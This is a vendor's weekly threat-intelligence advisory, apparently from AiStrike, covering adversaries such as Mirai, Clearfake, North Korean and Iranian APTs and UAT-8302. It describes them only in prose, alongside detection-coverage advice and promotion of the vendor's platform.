This week's threat landscape produced 9,366 indicators across 114 distinct adversaries, but the operationally important signal is concentrated in three patterns we're watching closely across customer environments:

• Parallel North Korean APT activity — DPRK, Kimsuky/APT43, and Scar Cruft generating fresh telemetry in the same seven-day window, with Scar Cruft executing a rare multi-OS supply-chain compromise.
• Iranian state operations under ransomware cover — a Chaos-branded ransomware incident assessed with moderate confidence as a Muddy Water false-flag operation, exactly the scenario where reactive SOC workflows commit to the wrong response.
• ClickFix / Clearfake dominance of initial access — 1,922 indicators in a single week, confirming that the "paste-this-into-PowerShell" lure has become the default initial-access path for commodity stealers. Below is the adversary breakdown with our detection engineering lens applied: what each threat looks like in customer telemetry, where reactive SOC workflows typically lose time, and what AiStrike automates so your team isn't the one losing it.

Below is the adversary breakdown with our detection engineering lens applied: what each threat looks like in customer telemetry, where reactive SOC workflows typically lose time, and what AiStrike automates so your team isn't the one losing it.

The underlying threat intelligence in this brief is produced in partnership with HACKFORLAB's research team. The detection engineering analysis, coverage priorities, and platform context are AiStrike's own

This Week in Numbers

• 9,366 IOCs indexed across 5 indicator types — URLs lead at 5,427, hashes at 3,200, domains at 613, IPsat 121, with a small set of email artifacts.
• 114 distinct adversaries active this week — meaningfully busier than the September 2025 baseline of ~85
• Severity skew is sharp: 7,601 IOCs (81%) carry a High severity rating; 1,703 are Medium; only 62 are Low
• By category: Malware leads with 4,487 IOCs across 81 distinct families. Malware campaigns account for1,988 indicators across 5 active campaigns. C2 infrastructure: 1,679 IOCs across 17 frameworks. Namedthreat actors: 1,126 IOCs across 7 groups.
• State-sponsored fingerprint: DPRK alone accounts for 987 IOCs at average confidence 97 — one of the highest-quality clusters in this week's dataset.

Featured Adversary: Mirai — IoT Botnet

2,205 IOCs · High Severity · Confidence 85

Linux-based IoT botnet family scanning the public internet for cameras, routers, DVRs, and embedded devices with weak or default credentials. Long-running CVE arsenal includes CVE-2017-17215, CVE-2018- 10561, CVE-2018-10562, and a half-dozen others most environments stopped tracking years ago. MITRE TTPs: T1110, T1071, T1105, T1498.

Where reactive workflows fall short. Mirai-family CVEs surface in vulnerability scans as low-priority “embedded device” findings. They get triaged, queued, and often forgotten — until a compromised device shows up as the pivot point in a larger incident. By then, the question is no longer “should we patch this?” but “how far did they get?”

The AiStrike detection engineering lens. Our platform correlates Mirai-family CVE signatures against your perimeter and segmentation telemetry continuously, not as a point-in-time scan. When an exposed device is reachable from an untrusted segment, we surface it as an exposure — not a vulnerability — and tie it to the active threat actors weaponizing that CVE this week. The output your team sees isn't "127 medium-severity findings"; it's "three devices on the wrong side of segmentation, all targeted by an active campaign, here's the blast radius."

Featured Adversary: Clear fake — Social-Engineering Malware Delivery

1,922 IOCs · High Severity · Confidence 80

Delivery technique that tricks users into copying attacker-supplied commands from fake error pages, "verify you are human" prompts, or compromised legitimate websites. The victim executes the payload manually — pasting attacker-controlled PowerShell into a Run dialog or terminal — which bypasses most automated controls because the malicious action originates inside the user's own session. Currently delivering Lumma, Vidar,RemcosRAT, and a rotating cast of loader chains. MITRE TTPs: T1566, T1204, T1059, T1105.

Where reactive workflows fall short. Clear fake is largely invisible to email gateways, web proxies, and end point AV at the point of compromise, because nothing malicious has touched the wire yet — just a webpage with text. The first telemetry you see is a PowerShell process spawning from a browser session, which many SOC workflows treat as either developer activity or a low-priority anomaly. By the time the downstream stealer fires a high-fidelity alert, credentials are often already exfiltrated. Mean dwell time on Clear fake intrusions is measured in minutes; mean detection time in IOC-centric environments is measured in hours.

The AiStrike detection engineering lens. We don't try to catch Clear fake at the malicious paste. We catch it at the behavior that follows — browser-spawned PowerShell, clipboard-sourced command execution, outbound connections to fresh infrastructure under three days old. Our platform correlates these signals against the active Clear fake campaign profile and elevates the session to investigation before the stealer payload completes, not after. For the 1,922 indicators in this week's feed, behavioral detection coverage is already deployed across customer environments — the question your team should be asking isn't "do we have the IOCs" but "is the behavioral detection live, and how do we know."

Featured Adversary: DPRK Cluster — North Korean APT

987 IOCs · High Severity · Confidence 97

State-aligned threat actor running spear phishing with weaponized documents and LNK loaders, delivering Rok RAT and custom implants. Heavy use of zero-day exploits (CVE-2018-4878, CVE-2016-4117), in-memory execution, living-off-the-land techniques, and modular backdoors. This week's 987 IOCs at confidence 97 make this one of the highest-quality clusters in the dataset. MITRE TTPs: T1190, T1105, T1041, T1082.

Where reactive workflows fall short. High-confidence APT indicators arrive as IOC lists — IPs, domains, hashes — that get loaded into a SIEM watchlist and surface only when something matches. The matches, when they happen, often arrive without context: an alert fires on a hash hit, but the analyst has no immediate view of which identity touched it, what the surrounding session looked like, or whether the indicator is part of an active campaign or a stale signature. The result is hours of context-gathering before any response decision can be made.

The AiStrike detection engineering lens. When a DPRK-attributed indicator surfaces in customer telemetry,our agentic investigation automatically reconstructs the surrounding session — identity, process tree, lateralmovement attempts, beaconing patterns — and maps it against the active campaign profile. Your analyst opensa single investigation that already answers the questions they would have spent 45 minutes assembling: who,where, what's connected, and what the highest-confidence next action is. For named-actor clusters at this confidence level, we're typically reducing mean-time-to-decision from hours to minutes.

Featured Adversary: ScarCruft — North Korea-Aligned Supply-Chain Compromise

24 IOCs · High Severity · Confidence 97

ESET researchers uncovered a multiplatform supply-chain attack by ScarCruft (APT37) targeting the Yanbianregion in China — home to ethnic Koreans and a crossing point for North Korean refugees and defectors. Thecampaign, likely ongoing since late 2024, compromised both Windows and Android components of a regionalgaming platform, trojanizing them with a backdoor. This is one of the rare publicly documented cases of a NorthKorean APT executing a full multi-OS supply-chain compromise of a niche regional platform.

Where reactive workflows fall short. Supply-chain compromises are the scenario where IOC-based detectionfails most completely. The malicious code arrives signed, from a trusted vendor, through a sanctioned updatechannel. No perimeter alert fires. No reputation system flags it. The first signal — if one ever surfaces — is ananomalous outbound connection from a workstation running software the organization deliberately installed.IOC-centric workflows are structurally late on this attack class, often until the third or fourth lateral hop, becausethe entry point doesn't look like an entry point.

The AiStrike detection engineering lens. Supply-chain compromise detection benefits from behavioralbaselining of trusted software at the per-process and per-identity level — what does this application normally do,what identities normally invoke it, what does its outbound profile look like. Our platform maintains thosebaselines continuously across customer environments and surfaces deviation patterns that map to known APTTTPs, not just to known IOCs. For the ScarCruft Yanbian campaign specifically, the relevant detection signatureisn't the hashes — those will rotate. It's the cross-platform parent-child behavior of the trojanized components,which is one of the few detection approaches that materially shortens the dwell-time window betweencompromise and discovery. We don't claim to catch every supply-chain attack; we claim to measurably compress the window where it goes unseen.

Featured Adversary: Muddy Water — Iranian APT Under Ransomware False Flag

19 IOCs · High Severity · Confidence 97

A Chaos-branded ransomware incident in early May was assessed by Rapid7, with moderate confidence, as a Muddy Water (Seed worm / MOIS-affiliated) operation running under Chaos RaaS branding as a false flag.Code-signing certificates and C2 infrastructure linked the activity back to the Iranian APT. The pattern matches the IRGC playbook of using cybercriminal cover for state operations.

Where reactive workflows fall short. This is one of the most expensive scenarios a reactive SOC workflowcan encounter. Ransomware playbooks are designed for speed: isolate, contain, restore, communicate. When the ransomware is the cover story for a state-sponsored intrusion, every action taken under the wrong play bookcan make the real problem worse — premature isolation tips off the operator, communication to "the affiliate" goes to an intelligence service, and the actual objective (espionage, persistence, supply-chain pivoting)continues after the "incident" is closed. Reactive workflows commit to the wrong response in the first hour and may not discover the misattribution for weeks.

The AiStrike detection engineering lens. Our agentic investigation pauses response escalation when the infrastructure signature crosses known state-actor clusters, even when the surface-level indicators say ransomware. The platform surfaces the conflict — "Chaos branding, but code-signing infrastructure matches Muddy Water operator clusters from prior campaigns" — before the playbook commits to a containment path.That single pause, and the evidence that justifies it, is the difference between a clean state-actor investigation and a months-long quiet compromise dressed up as a ransomware incident.

Featured Adversary: UAT-8302 — China-Nexus APT

44 IOCs · High Severity · Confidence 97

Cisco Talos-disclosed China-nexus APT targeting government entities in South America (since late 2024) and southeastern Europe (in 2025). Deploys Net Draft — a C# variant of the FinalDraft / SquidDoor backdoor family— alongside an updated Cloud Sorcerer backdoor previously seen against Russian government entities in 2024.The cluster overlaps with Jewel bug, REF7707, CL-STA-0049, and Long Nosed Goblin in other vendors' tracking.

Where reactive workflows fall short. UAT-8302's tradecraft is built around legitimate cloud services ascommand-and-control. Cloud Sorcerer family backdoors use cloud APIs — Microsoft Graph, Yandex Cloud,Dropbox, GitHub — as the C2 transport. To a perimeter SIEM, this looks like normal SaaS traffic from acorporate identity to a corporate cloud. There is no malicious domain to block, no anomalous TLS fingerprint, noexotic protocol. Detection requires baselining what each identity is supposed to do in those cloud services, not what cloud services they're allowed to reach. Many SOC workflows don't maintain that baseline at the per-identity, per-API level, which is why this attack class has been quietly successful for two years.

The AiStrike detection engineering lens. This is the threat class where our cloud-native posture matters most.We baseline identity behavior across AWS, Azure, and the SaaS surface continuously, and we elevate sessions where the API call patterns deviate from the identity's role — even when every individual call is permitted. ForUAT-8302 specifically, the signature isn't "calls to GitHub"; it's "calls to GitHub from an identity that has never used GitHub before, immediately following a successful authentication from a residential ASN." That correlationis what we automate, and reactive SIEM-centric workflows struggle to match it on time-to-detection because theunder lying baselining requirement isn't part of how those workflows are built.

MITRE ATT&CK Coverage Validation — This Week's Priorities

The adversaries above concentrate around a recognizable set of ATT&CK techniques. If you only have time to validate detection coverage on a subset of techniques this week, validate these — they are the techniques your team is most likely to encounter in customer telemetry between now and the next advisory.

‍

Coverage validation steps for the week:

1. Run an ATT&CK heat-map self-assessment against the table above. For each technique marked Criticlor High, identify whether you have at least one alerting detection in your environment and at least one hunting query.
2. For T1566 + T1204 + T1059 together — the Cleabrfake chain — validate that your detection can fire on these quence (phishing landing → user execution → script interpreter), not just on the individual techniques. The chain is the signal; the techniques in isolation are too noisy to alert on.
3. For T1078 in cloud environments — the UAT-8302 tradecraft — confirm you have per-identity, per-API baselining, not just "is this account allowed to call this service." Most SIEM-driven environments answer the wrong question here.
4. For T1041 across DPRK and Kimsuky — confirm that your egress monitoring covers the 51.79.0.0/16and 27.102.0.0/16 ranges named in this week's high-confidence IOCs (full IOC list available on request).

Detection Engineering Priorities This Week

The seven priorities below convert this week's adversary data into platform-automated outcomes. If your SOC is running these as manual hunts, every one of them is a place where time-to-decision can be measurably compressed.

1. Continuous CVE-to-exposure mapping for the Mirai / Mozi long tail. Patching the perimeter isn't aquarterly project; it's a continuous reconciliation of "which devices are exposed, to which CVEs, weaponizedby which active actors this week." Our platform maintains that mapping in real time and surfaces only the inter sections that matter.
2. Behavioral detection for ClickFix / Clearfake initial access. IOCs rotate weekly. Browser-spawnedinteractive shells and clipboard-sourced execution don't. We deploy detection coverage for the behavioralsignature, not the indicators, which is why this week's 1,922 new Clearfake URLs don't change our customers' detection posture.
3. Identity-level baselining for RMM tool abuse. ITarian, PDQ, SimpleHelp, Atera, Screen Connect —legitimate tools, blocked by no one. The VENOMOUS#HELPER cluster's 41 IOCs are a reminder that theright control isn't blocking the tools but knowing which identities should be using them. We baseline this per-identity and alert on the deviation.
4. Cross-platform supply-chain behavior analytics. The ScarCruft Yanbian compromise is the canonicalexample: hash-based detection will always be late. Per-application behavioral baselines, sustained acrossWindows and Android telemetry, are one of the few approaches that materially shortens the dwell window forthis attack class.
5. State-actor false-flag pause logic. When ransomware-branded infrastructure crosses known state-actoroperator clusters, our platform pauses response escalation and surfaces the conflict to the analyst before thecontainment playbook commits. The MuddyWater-as-Chaos incident is exactly the scenario this logic is builtfor.
6. Cloud-API identity baselining for China-nexus tradecraft. UAT-8302 and its overlapping clustersdemonstrate that C2-over-SaaS is now a dominant exfiltration path for sophisticated APTs. Detectionrequires baselining identity behavior in the cloud control plane, not at the perimeter. This is native to our platform.
7. Continuous patching prioritization for weaponized long-tail CVEs. EternalBlue (CVE-2017-0144),Follina (CVE-2022-30190), and Equation Editor (CVE-2017-11882) are still being weaponized in 2026. Ourplatform tracks which dormant vulnerabilities in your environment have been picked back up in activecampaigns this week, so the patch queue reflects threat reality, not vulnerability inventory.

See This in Production at Gartner SRM 2026

If the Muddy Water false-flag scenario, the UAT-8302 cloud-API detection logic, or the ScarCruft cross-platform baselining are familiar problems in your environment, we'll be walking through all three in production telemetry atGartner Security & Risk Management Summit 2026 — Booth #453, June 1–3, National Harbor, MD.

Live demos focus on the operational moments this brief describes: the investigation pause when ransom ware infrastructure crosses state-actor clusters, the identity baseline that catches cloud-API C2, and the behavior aldetection that doesn't care which IOCs Clearfake rotates next week.

Book a meeting

The AiStrike Detection Engineering Advisory publishes weekly. Subscribe for next week's coverage validation priorities,ATT&CK technique deep-dives, and platform-automated detection outcomes.AiStrike delivers AI-native, preemptive cyber defense — turning reactive SOCs into proactive ones through agent icinvestigation, continuous detection optimization, and automated response. Customers see 50% lower SOC costs and 90%fewer false positives. Threat intelligence partnership: HACKFORLAB. Detection engineering analysis: AiStrike Detection Operations.